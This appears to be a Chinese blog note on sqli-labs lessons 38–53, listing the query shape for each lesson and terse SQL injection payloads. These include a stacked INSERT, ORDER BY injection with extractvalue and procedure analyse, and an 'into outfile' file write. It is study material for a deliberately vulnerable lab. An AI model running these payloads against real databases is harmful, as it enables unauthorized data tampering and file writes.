zoukankan      html  css  js  c++  java
  • sqli-lab(Stacked)

    (堆叠注入)
    Less-38:

    select * from table where id='1';
    ';insert into user values(20,'test','test')%23

    Less-39:
    select * from table where id=1;

    Less-40:
    select * from table where id=('1');

    Less-41:
    select * from table where id=1;

    Less-42:
    select * from table where username='admin' and password='admin';
    password处注入

    Less-43:
    select * from table where username=('admin') and password=('admin');

    Less-44:
    select * from table where username='admin' and password='admin';

    Less-45:
    select * from table where username=('admin') and password=('admin');


    (order by注入)
    Less-46:

    select * from table  order by 1;
    ?sort=rand(1)
    ?sort=1 and extractvalue()
    ?sort=1  procedure analyse(extractvalue(),1)
    ?sort=1 into outfile "path"

    Less-47:
    select * from table order by '1;
    ?sort=1' and extractvalue()%23

    Less-48:
    select *& from table order by 1;
    ?sort=if()

    Less-49:
    select * from table order by '1;


    (堆叠order by注入)
    Less-50:

    select *& from table order by 1;

    Less-51:
    select *& from table order by '1';

    Less-52:
    select *& from table order by 1;

    Less-53:
    select *& from table order by '1';

  • 相关阅读:
    C语言实现快排
    C语言实现双向循环链表
    mysql插入数据后返回自增ID的方法
    golang flag包简单例子
    练习题 (六)
    练习题 (五)
    练习题 (四)
    练习题 (三)
    练习题 (二)
    练习题 (一)
  • 原文地址:https://www.cnblogs.com/f1veseven/p/13414167.html
Copyright © 2011-2022 走看看